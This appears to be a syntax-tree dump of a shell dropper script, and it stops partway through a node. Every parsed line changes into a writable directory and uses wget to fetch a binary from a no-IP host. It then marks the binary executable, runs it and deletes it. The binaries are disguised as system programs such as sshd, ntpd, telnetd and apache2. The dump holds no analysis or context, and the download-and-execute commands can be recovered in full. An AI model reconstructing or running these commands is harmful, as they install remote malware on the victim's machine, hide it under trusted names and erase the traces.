ListNode(lineno=2, pos=(12, 139), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 103), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 103), word='http://r00t1ng97.hopto.org/ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(103, 104)),
  CommandNode(lineno=2, pos=(105, 118), parts=[
    WordNode(lineno=2, pos=(105, 110), word='chmod'),
    WordNode(lineno=2, pos=(111, 113), word='+x'),
    WordNode(lineno=2, pos=(114, 118), word='ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(118, 119)),
  CommandNode(lineno=2, pos=(120, 126), parts=[
    WordNode(lineno=2, pos=(120, 126), word='./ntpd'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(126, 127)),
  CommandNode(lineno=2, pos=(128, 139), parts=[
    WordNode(lineno=2, pos=(128, 130), word='rm'),
    WordNode(lineno=2, pos=(131, 134), word='-rf'),
    WordNode(lineno=2, pos=(135, 139), word='ntpd'),
  ]),
])
ListNode(lineno=3, pos=(140, 267), parts=[
  CommandNode(lineno=3, pos=(140, 147), parts=[
    WordNode(lineno=3, pos=(140, 142), word='cd'),
    WordNode(lineno=3, pos=(143, 147), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(148, 150)),
  CommandNode(lineno=3, pos=(151, 162), parts=[
    WordNode(lineno=3, pos=(151, 153), word='cd'),
    WordNode(lineno=3, pos=(154, 162), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(163, 165)),
  CommandNode(lineno=3, pos=(166, 173), parts=[
    WordNode(lineno=3, pos=(166, 168), word='cd'),
    WordNode(lineno=3, pos=(169, 173), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(174, 176)),
  CommandNode(lineno=3, pos=(177, 185), parts=[
    WordNode(lineno=3, pos=(177, 179), word='cd'),
    WordNode(lineno=3, pos=(180, 185), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(186, 188)),
  CommandNode(lineno=3, pos=(189, 193), parts=[
    WordNode(lineno=3, pos=(189, 191), word='cd'),
    WordNode(lineno=3, pos=(192, 193), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(193, 194)),
  CommandNode(lineno=3, pos=(195, 231), parts=[
    WordNode(lineno=3, pos=(195, 199), word='wget'),
    WordNode(lineno=3, pos=(200, 231), word='http://r00t1ng97.hopto.org/sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(231, 232)),
  CommandNode(lineno=3, pos=(233, 246), parts=[
    WordNode(lineno=3, pos=(233, 238), word='chmod'),
    WordNode(lineno=3, pos=(239, 241), word='+x'),
    WordNode(lineno=3, pos=(242, 246), word='sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(246, 247)),
  CommandNode(lineno=3, pos=(248, 254), parts=[
    WordNode(lineno=3, pos=(248, 254), word='./sshd'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(254, 255)),
  CommandNode(lineno=3, pos=(256, 267), parts=[
    WordNode(lineno=3, pos=(256, 258), word='rm'),
    WordNode(lineno=3, pos=(259, 262), word='-rf'),
    WordNode(lineno=3, pos=(263, 267), word='sshd'),
  ]),
])
ListNode(lineno=4, pos=(268, 407), parts=[
  CommandNode(lineno=4, pos=(268, 275), parts=[
    WordNode(lineno=4, pos=(268, 270), word='cd'),
    WordNode(lineno=4, pos=(271, 275), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(276, 278)),
  CommandNode(lineno=4, pos=(279, 290), parts=[
    WordNode(lineno=4, pos=(279, 281), word='cd'),
    WordNode(lineno=4, pos=(282, 290), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(291, 293)),
  CommandNode(lineno=4, pos=(294, 301), parts=[
    WordNode(lineno=4, pos=(294, 296), word='cd'),
    WordNode(lineno=4, pos=(297, 301), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(302, 304)),
  CommandNode(lineno=4, pos=(305, 313), parts=[
    WordNode(lineno=4, pos=(305, 307), word='cd'),
    WordNode(lineno=4, pos=(308, 313), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(314, 316)),
  CommandNode(lineno=4, pos=(317, 321), parts=[
    WordNode(lineno=4, pos=(317, 319), word='cd'),
    WordNode(lineno=4, pos=(320, 321), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(321, 322)),
  CommandNode(lineno=4, pos=(323, 362), parts=[
    WordNode(lineno=4, pos=(323, 327), word='wget'),
    WordNode(lineno=4, pos=(328, 362), word='http://r00t1ng97.hopto.org/openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(362, 363)),
  CommandNode(lineno=4, pos=(364, 380), parts=[
    WordNode(lineno=4, pos=(364, 369), word='chmod'),
    WordNode(lineno=4, pos=(370, 372), word='+x'),
    WordNode(lineno=4, pos=(373, 380), word='openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(380, 381)),
  CommandNode(lineno=4, pos=(382, 391), parts=[
    WordNode(lineno=4, pos=(382, 391), word='./openssh'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(391, 392)),
  CommandNode(lineno=4, pos=(393, 407), parts=[
    WordNode(lineno=4, pos=(393, 395), word='rm'),
    WordNode(lineno=4, pos=(396, 399), word='-rf'),
    WordNode(lineno=4, pos=(400, 407), word='openssh'),
  ]),
])
ListNode(lineno=5, pos=(408, 535), parts=[
  CommandNode(lineno=5, pos=(408, 415), parts=[
    WordNode(lineno=5, pos=(408, 410), word='cd'),
    WordNode(lineno=5, pos=(411, 415), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(416, 418)),
  CommandNode(lineno=5, pos=(419, 430), parts=[
    WordNode(lineno=5, pos=(419, 421), word='cd'),
    WordNode(lineno=5, pos=(422, 430), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(431, 433)),
  CommandNode(lineno=5, pos=(434, 441), parts=[
    WordNode(lineno=5, pos=(434, 436), word='cd'),
    WordNode(lineno=5, pos=(437, 441), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(442, 444)),
  CommandNode(lineno=5, pos=(445, 453), parts=[
    WordNode(lineno=5, pos=(445, 447), word='cd'),
    WordNode(lineno=5, pos=(448, 453), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(454, 456)),
  CommandNode(lineno=5, pos=(457, 461), parts=[
    WordNode(lineno=5, pos=(457, 459), word='cd'),
    WordNode(lineno=5, pos=(460, 461), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(461, 462)),
  CommandNode(lineno=5, pos=(463, 499), parts=[
    WordNode(lineno=5, pos=(463, 467), word='wget'),
    WordNode(lineno=5, pos=(468, 499), word='http://r00t1ng97.hopto.org/bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(499, 500)),
  CommandNode(lineno=5, pos=(501, 514), parts=[
    WordNode(lineno=5, pos=(501, 506), word='chmod'),
    WordNode(lineno=5, pos=(507, 509), word='+x'),
    WordNode(lineno=5, pos=(510, 514), word='bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(514, 515)),
  CommandNode(lineno=5, pos=(516, 522), parts=[
    WordNode(lineno=5, pos=(516, 522), word='./bash'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(522, 523)),
  CommandNode(lineno=5, pos=(524, 535), parts=[
    WordNode(lineno=5, pos=(524, 526), word='rm'),
    WordNode(lineno=5, pos=(527, 530), word='-rf'),
    WordNode(lineno=5, pos=(531, 535), word='bash'),
  ]),
])
ListNode(lineno=6, pos=(536, 663), parts=[
  CommandNode(lineno=6, pos=(536, 543), parts=[
    WordNode(lineno=6, pos=(536, 538), word='cd'),
    WordNode(lineno=6, pos=(539, 543), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(544, 546)),
  CommandNode(lineno=6, pos=(547, 558), parts=[
    WordNode(lineno=6, pos=(547, 549), word='cd'),
    WordNode(lineno=6, pos=(550, 558), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(559, 561)),
  CommandNode(lineno=6, pos=(562, 569), parts=[
    WordNode(lineno=6, pos=(562, 564), word='cd'),
    WordNode(lineno=6, pos=(565, 569), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(570, 572)),
  CommandNode(lineno=6, pos=(573, 581), parts=[
    WordNode(lineno=6, pos=(573, 575), word='cd'),
    WordNode(lineno=6, pos=(576, 581), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(582, 584)),
  CommandNode(lineno=6, pos=(585, 589), parts=[
    WordNode(lineno=6, pos=(585, 587), word='cd'),
    WordNode(lineno=6, pos=(588, 589), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(589, 590)),
  CommandNode(lineno=6, pos=(591, 627), parts=[
    WordNode(lineno=6, pos=(591, 595), word='wget'),
    WordNode(lineno=6, pos=(596, 627), word='http://r00t1ng97.hopto.org/tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(627, 628)),
  CommandNode(lineno=6, pos=(629, 642), parts=[
    WordNode(lineno=6, pos=(629, 634), word='chmod'),
    WordNode(lineno=6, pos=(635, 637), word='+x'),
    WordNode(lineno=6, pos=(638, 642), word='tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(642, 643)),
  CommandNode(lineno=6, pos=(644, 650), parts=[
    WordNode(lineno=6, pos=(644, 650), word='./tftp'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(650, 651)),
  CommandNode(lineno=6, pos=(652, 663), parts=[
    WordNode(lineno=6, pos=(652, 654), word='rm'),
    WordNode(lineno=6, pos=(655, 658), word='-rf'),
    WordNode(lineno=6, pos=(659, 663), word='tftp'),
  ]),
])
ListNode(lineno=7, pos=(664, 791), parts=[
  CommandNode(lineno=7, pos=(664, 671), parts=[
    WordNode(lineno=7, pos=(664, 666), word='cd'),
    WordNode(lineno=7, pos=(667, 671), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(672, 674)),
  CommandNode(lineno=7, pos=(675, 686), parts=[
    WordNode(lineno=7, pos=(675, 677), word='cd'),
    WordNode(lineno=7, pos=(678, 686), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(687, 689)),
  CommandNode(lineno=7, pos=(690, 697), parts=[
    WordNode(lineno=7, pos=(690, 692), word='cd'),
    WordNode(lineno=7, pos=(693, 697), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(698, 700)),
  CommandNode(lineno=7, pos=(701, 709), parts=[
    WordNode(lineno=7, pos=(701, 703), word='cd'),
    WordNode(lineno=7, pos=(704, 709), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(710, 712)),
  CommandNode(lineno=7, pos=(713, 717), parts=[
    WordNode(lineno=7, pos=(713, 715), word='cd'),
    WordNode(lineno=7, pos=(716, 717), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(717, 718)),
  CommandNode(lineno=7, pos=(719, 755), parts=[
    WordNode(lineno=7, pos=(719, 723), word='wget'),
    WordNode(lineno=7, pos=(724, 755), word='http://r00t1ng97.hopto.org/wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(755, 756)),
  CommandNode(lineno=7, pos=(757, 770), parts=[
    WordNode(lineno=7, pos=(757, 762), word='chmod'),
    WordNode(lineno=7, pos=(763, 765), word='+x'),
    WordNode(lineno=7, pos=(766, 770), word='wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(770, 771)),
  CommandNode(lineno=7, pos=(772, 778), parts=[
    WordNode(lineno=7, pos=(772, 778), word='./wget'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(778, 779)),
  CommandNode(lineno=7, pos=(780, 791), parts=[
    WordNode(lineno=7, pos=(780, 782), word='rm'),
    WordNode(lineno=7, pos=(783, 786), word='-rf'),
    WordNode(lineno=7, pos=(787, 791), word='wget'),
  ]),
])
ListNode(lineno=8, pos=(792, 919), parts=[
  CommandNode(lineno=8, pos=(792, 799), parts=[
    WordNode(lineno=8, pos=(792, 794), word='cd'),
    WordNode(lineno=8, pos=(795, 799), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(800, 802)),
  CommandNode(lineno=8, pos=(803, 814), parts=[
    WordNode(lineno=8, pos=(803, 805), word='cd'),
    WordNode(lineno=8, pos=(806, 814), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(815, 817)),
  CommandNode(lineno=8, pos=(818, 825), parts=[
    WordNode(lineno=8, pos=(818, 820), word='cd'),
    WordNode(lineno=8, pos=(821, 825), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(826, 828)),
  CommandNode(lineno=8, pos=(829, 837), parts=[
    WordNode(lineno=8, pos=(829, 831), word='cd'),
    WordNode(lineno=8, pos=(832, 837), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(838, 840)),
  CommandNode(lineno=8, pos=(841, 845), parts=[
    WordNode(lineno=8, pos=(841, 843), word='cd'),
    WordNode(lineno=8, pos=(844, 845), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(845, 846)),
  CommandNode(lineno=8, pos=(847, 883), parts=[
    WordNode(lineno=8, pos=(847, 851), word='wget'),
    WordNode(lineno=8, pos=(852, 883), word='http://r00t1ng97.hopto.org/cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(883, 884)),
  CommandNode(lineno=8, pos=(885, 898), parts=[
    WordNode(lineno=8, pos=(885, 890), word='chmod'),
    WordNode(lineno=8, pos=(891, 893), word='+x'),
    WordNode(lineno=8, pos=(894, 898), word='cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(898, 899)),
  CommandNode(lineno=8, pos=(900, 906), parts=[
    WordNode(lineno=8, pos=(900, 906), word='./cron'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(906, 907)),
  CommandNode(lineno=8, pos=(908, 919), parts=[
    WordNode(lineno=8, pos=(908, 910), word='rm'),
    WordNode(lineno=8, pos=(911, 914), word='-rf'),
    WordNode(lineno=8, pos=(915, 919), word='cron'),
  ]),
])
ListNode(lineno=9, pos=(920, 1043), parts=[
  CommandNode(lineno=9, pos=(920, 927), parts=[
    WordNode(lineno=9, pos=(920, 922), word='cd'),
    WordNode(lineno=9, pos=(923, 927), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(928, 930)),
  CommandNode(lineno=9, pos=(931, 942), parts=[
    WordNode(lineno=9, pos=(931, 933), word='cd'),
    WordNode(lineno=9, pos=(934, 942), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(943, 945)),
  CommandNode(lineno=9, pos=(946, 953), parts=[
    WordNode(lineno=9, pos=(946, 948), word='cd'),
    WordNode(lineno=9, pos=(949, 953), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(954, 956)),
  CommandNode(lineno=9, pos=(957, 965), parts=[
    WordNode(lineno=9, pos=(957, 959), word='cd'),
    WordNode(lineno=9, pos=(960, 965), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(966, 968)),
  CommandNode(lineno=9, pos=(969, 973), parts=[
    WordNode(lineno=9, pos=(969, 971), word='cd'),
    WordNode(lineno=9, pos=(972, 973), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(973, 974)),
  CommandNode(lineno=9, pos=(975, 1010), parts=[
    WordNode(lineno=9, pos=(975, 979), word='wget'),
    WordNode(lineno=9, pos=(980, 1010), word='http://r00t1ng97.hopto.org/ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1010, 1011)),
  CommandNode(lineno=9, pos=(1012, 1024), parts=[
    WordNode(lineno=9, pos=(1012, 1017), word='chmod'),
    WordNode(lineno=9, pos=(1018, 1020), word='+x'),
    WordNode(lineno=9, pos=(1021, 1024), word='ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1024, 1025)),
  CommandNode(lineno=9, pos=(1026, 1031), parts=[
    WordNode(lineno=9, pos=(1026, 1031), word='./ftp'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1031, 1032)),
  CommandNode(lineno=9, pos=(1033, 1043), parts=[
    WordNode(lineno=9, pos=(1033, 1035), word='rm'),
    WordNode(lineno=9, pos=(1036, 1039), word='-rf'),
    WordNode(lineno=9, pos=(1040, 1043), word='ftp'),
  ]),
])
ListNode(lineno=10, pos=(1044, 1171), parts=[
  CommandNode(lineno=10, pos=(1044, 1051), parts=[
    WordNode(lineno=10, pos=(1044, 1046), word='cd'),
    WordNode(lineno=10, pos=(1047, 1051), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1052, 1054)),
  CommandNode(lineno=10, pos=(1055, 1066), parts=[
    WordNode(lineno=10, pos=(1055, 1057), word='cd'),
    WordNode(lineno=10, pos=(1058, 1066), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1067, 1069)),
  CommandNode(lineno=10, pos=(1070, 1077), parts=[
    WordNode(lineno=10, pos=(1070, 1072), word='cd'),
    WordNode(lineno=10, pos=(1073, 1077), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1078, 1080)),
  CommandNode(lineno=10, pos=(1081, 1089), parts=[
    WordNode(lineno=10, pos=(1081, 1083), word='cd'),
    WordNode(lineno=10, pos=(1084, 1089), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1090, 1092)),
  CommandNode(lineno=10, pos=(1093, 1097), parts=[
    WordNode(lineno=10, pos=(1093, 1095), word='cd'),
    WordNode(lineno=10, pos=(1096, 1097), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1097, 1098)),
  CommandNode(lineno=10, pos=(1099, 1135), parts=[
    WordNode(lineno=10, pos=(1099, 1103), word='wget'),
    WordNode(lineno=10, pos=(1104, 1135), word='http://r00t1ng97.hopto.org/pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1135, 1136)),
  CommandNode(lineno=10, pos=(1137, 1150), parts=[
    WordNode(lineno=10, pos=(1137, 1142), word='chmod'),
    WordNode(lineno=10, pos=(1143, 1145), word='+x'),
    WordNode(lineno=10, pos=(1146, 1150), word='pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1150, 1151)),
  CommandNode(lineno=10, pos=(1152, 1158), parts=[
    WordNode(lineno=10, pos=(1152, 1158), word='./pftp'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1158, 1159)),
  CommandNode(lineno=10, pos=(1160, 1171), parts=[
    WordNode(lineno=10, pos=(1160, 1162), word='rm'),
    WordNode(lineno=10, pos=(1163, 1166), word='-rf'),
    WordNode(lineno=10, pos=(1167, 1171), word='pftp'),
  ]),
])
ListNode(lineno=11, pos=(1172, 1291), parts=[
  CommandNode(lineno=11, pos=(1172, 1179), parts=[
    WordNode(lineno=11, pos=(1172, 1174), word='cd'),
    WordNode(lineno=11, pos=(1175, 1179), word='/tmp'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1180, 1182)),
  CommandNode(lineno=11, pos=(1183, 1194), parts=[
    WordNode(lineno=11, pos=(1183, 1185), word='cd'),
    WordNode(lineno=11, pos=(1186, 1194), word='/var/run'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1195, 1197)),
  CommandNode(lineno=11, pos=(1198, 1205), parts=[
    WordNode(lineno=11, pos=(1198, 1200), word='cd'),
    WordNode(lineno=11, pos=(1201, 1205), word='/mnt'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1206, 1208)),
  CommandNode(lineno=11, pos=(1209, 1217), parts=[
    WordNode(lineno=11, pos=(1209, 1211), word='cd'),
    WordNode(lineno=11, pos=(1212, 1217), word='/root'),
  ]),
  OperatorNode(lineno=11, op='||', pos=(1218, 1220)),
  CommandNode(lineno=11, pos=(1221, 1225), parts=[
    WordNode(lineno=11, pos=(1221, 1223), word='cd'),
    WordNode(lineno=11, pos=(1224, 1225), word='/'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1225, 1226)),
  CommandNode(lineno=11, pos=(1227, 1261), parts=[
    WordNode(lineno=11, pos=(1227, 1231), word='wget'),
    WordNode(lineno=11, pos=(1232, 1261), word='http://r00t1ng97.hopto.org/sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1261, 1262)),
  CommandNode(lineno=11, pos=(1263, 1274), parts=[
    WordNode(lineno=11, pos=(1263, 1268), word='chmod'),
    WordNode(lineno=11, pos=(1269, 1271), word='+x'),
    WordNode(lineno=11, pos=(1272, 1274), word='sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1274, 1275)),
  CommandNode(lineno=11, pos=(1276, 1280), parts=[
    WordNode(lineno=11, pos=(1276, 1280), word='./sh'),
  ]),
  OperatorNode(lineno=11, op=';', pos=(1280, 1281)),
  CommandNode(lineno=11, pos=(1282, 1291), parts=[
    WordNode(lineno=11, pos=(1282, 1284), word='rm'),
    WordNode(lineno=11, pos=(1285, 1288), word='-rf'),
    WordNode(lineno=11, pos=(1289, 1291), word='sh'),
  ]),
])
ListNode(lineno=12, pos=(1292, 1423), parts=[
  CommandNode(lineno=12, pos=(1292, 1299), parts=[
    WordNode(lineno=12, pos=(1292, 1294), word='cd'),
    WordNode(lineno=12, pos=(1295, 1299), word='/tmp'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1300, 1302)),
  CommandNode(lineno=12, pos=(1303, 1314), parts=[
    WordNode(lineno=12, pos=(1303, 1305), word='cd'),
    WordNode(lineno=12, pos=(1306, 1314), word='/var/run'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1315, 1317)),
  CommandNode(lineno=12, pos=(1318, 1325), parts=[
    WordNode(lineno=12, pos=(1318, 1320), word='cd'),
    WordNode(lineno=12, pos=(1321, 1325), word='/mnt'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1326, 1328)),
  CommandNode(lineno=12, pos=(1329, 1337), parts=[
    WordNode(lineno=12, pos=(1329, 1331), word='cd'),
    WordNode(lineno=12, pos=(1332, 1337), word='/root'),
  ]),
  OperatorNode(lineno=12, op='||', pos=(1338, 1340)),
  CommandNode(lineno=12, pos=(1341, 1345), parts=[
    WordNode(lineno=12, pos=(1341, 1343), word='cd'),
    WordNode(lineno=12, pos=(1344, 1345), word='/'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1345, 1346)),
  CommandNode(lineno=12, pos=(1347, 1384), parts=[
    WordNode(lineno=12, pos=(1347, 1351), word='wget'),
    WordNode(lineno=12, pos=(1352, 1384), word='http://r00t1ng97.hopto.org/[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1384, 1385)),
  CommandNode(lineno=12, pos=(1386, 1400), parts=[
    WordNode(lineno=12, pos=(1386, 1391), word='chmod'),
    WordNode(lineno=12, pos=(1392, 1394), word='+x'),
    WordNode(lineno=12, pos=(1395, 1400), word='[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1400, 1401)),
  CommandNode(lineno=12, pos=(1402, 1409), parts=[
    WordNode(lineno=12, pos=(1402, 1409), word='./[cpu]'),
  ]),
  OperatorNode(lineno=12, op=';', pos=(1409, 1410)),
  CommandNode(lineno=12, pos=(1411, 1423), parts=[
    WordNode(lineno=12, pos=(1411, 1413), word='rm'),
    WordNode(lineno=12, pos=(1414, 1417), word='-rf'),
    WordNode(lineno=12, pos=(1418, 1423), word='[cpu]'),
  ]),
])
ListNode(lineno=13, pos=(1424, 1563), parts=[
  CommandNode(lineno=13, pos=(1424, 1431), parts=[
    WordNode(lineno=13, pos=(1424, 1426), word='cd'),
    WordNode(lineno=13, pos=(1427, 1431), word='/tmp'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1432, 1434)),
  CommandNode(lineno=13, pos=(1435, 1446), parts=[
    WordNode(lineno=13, pos=(1435, 1437), word='cd'),
    WordNode(lineno=13, pos=(1438, 1446), word='/var/run'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1447, 1449)),
  CommandNode(lineno=13, pos=(1450, 1457), parts=[
    WordNode(lineno=13, pos=(1450, 1452), word='cd'),
    WordNode(lineno=13, pos=(1453, 1457), word='/mnt'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1458, 1460)),
  CommandNode(lineno=13, pos=(1461, 1469), parts=[
    WordNode(lineno=13, pos=(1461, 1463), word='cd'),
    WordNode(lineno=13, pos=(1464, 1469), word='/root'),
  ]),
  OperatorNode(lineno=13, op='||', pos=(1470, 1472)),
  CommandNode(lineno=13, pos=(1473, 1477), parts=[
    WordNode(lineno=13, pos=(1473, 1475), word='cd'),
    WordNode(lineno=13, pos=(1476, 1477), word='/'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1477, 1478)),
  CommandNode(lineno=13, pos=(1479, 1518), parts=[
    WordNode(lineno=13, pos=(1479, 1483), word='wget'),
    WordNode(lineno=13, pos=(1484, 1518), word='http://r00t1ng97.hopto.org/apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1518, 1519)),
  CommandNode(lineno=13, pos=(1520, 1536), parts=[
    WordNode(lineno=13, pos=(1520, 1525), word='chmod'),
    WordNode(lineno=13, pos=(1526, 1528), word='+x'),
    WordNode(lineno=13, pos=(1529, 1536), word='apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1536, 1537)),
  CommandNode(lineno=13, pos=(1538, 1547), parts=[
    WordNode(lineno=13, pos=(1538, 1547), word='./apache2'),
  ]),
  OperatorNode(lineno=13, op=';', pos=(1547, 1548)),
  CommandNode(lineno=13, pos=(1549, 1563), parts=[
    WordNode(lineno=13, pos=(1549, 1551), word='rm'),
    WordNode(lineno=13, pos=(1552, 1555), word='-rf'),
    WordNode(lineno=13, pos=(1556, 1563), word='apache2'),
  ]),
])
ListNode(lineno=14, pos=(1564, 1703), parts=[
  CommandNode(lineno=14, pos=(1564, 1571), parts=[
    WordNode(lineno=14, pos=(1564, 1566), word='cd'),
    WordNode(lineno=14, pos=(1567, 1571), word='/tmp'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1572, 1574)),
  CommandNode(lineno=14, pos=(1575, 1586), parts=[
    WordNode(lineno=14, pos=(1575, 1577), word='cd'),
    WordNode(lineno=14, pos=(1578, 1586), word='/var/run'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1587, 1589)),
  CommandNode(lineno=14, pos=(1590, 1597), parts=[
    WordNode(lineno=14, pos=(1590, 1592), word='cd'),
    WordNode(lineno=14, pos=(1593, 1597), word='/mnt'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1598, 1600)),
  CommandNode(lineno=14, pos=(1601, 1609), parts=[
    WordNode(lineno=14, pos=(1601, 1603), word='cd'),
    WordNode(lineno=14, pos=(1604, 1609), word='/root'),
  ]),
  OperatorNode(lineno=14, op='||', pos=(1610, 1612)),
  CommandNode(lineno=14, pos=(1613, 1617), parts=[
    WordNode(lineno=14, pos=(1613, 1615), word='cd'),
    WordNode(lineno=14, pos=(1616, 1617), word='/'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1617, 1618)),
  CommandNode(lineno=14, pos=(1619, 1658), parts=[
    WordNode(lineno=14, pos=(1619, 1623), word='wget'),
    WordNode(lineno=14, pos=(1624, 1658), word='http://r00t1ng97.hopto.org/telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1658, 1659)),
  CommandNode(lineno=14, pos=(1660, 1676), parts=[
    WordNode(lineno=14, pos=(1660, 1665), word='chmod'),
    WordNode(lineno=14, pos=(1666, 1668), word='+x'),
    WordNode(lineno=14, pos=(1669, 1676), word='telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1676, 1677)),
  CommandNode(lineno=14, pos=(1678, 1687), parts=[
    WordNode(lineno=14, pos=(1678, 1687), word='./telnetd'),
  ]),
  OperatorNode(lineno=14, op=';', pos=(1687, 1688)),
  CommandNode(lineno=14, pos=(1689, 1703), parts=[
    WordNode(lineno=14, pos=(1689, 1691), word='rm'),
    WordNode(lineno=14, pos=(1692, 1695), word='-rf'),
    WordNode(lineno=14, pos=(1696, 1703), word='telnetd'),
  ]),
])
ListNode(lineno=19, pos=(1708, 1859), parts=[
  CommandNode(lineno=19, pos=(1708, 1715), parts=[
    WordNode(lineno=19, pos=(1708, 1710), word='cd'),
    WordNode(lineno=19, pos=(1711, 1715), word='/tmp'),
  ]),
  OperatorNode(lineno=19, op='||', pos=(1716, 1718)),
  CommandNode(lineno=19, pos=(1719, 1730), parts=[
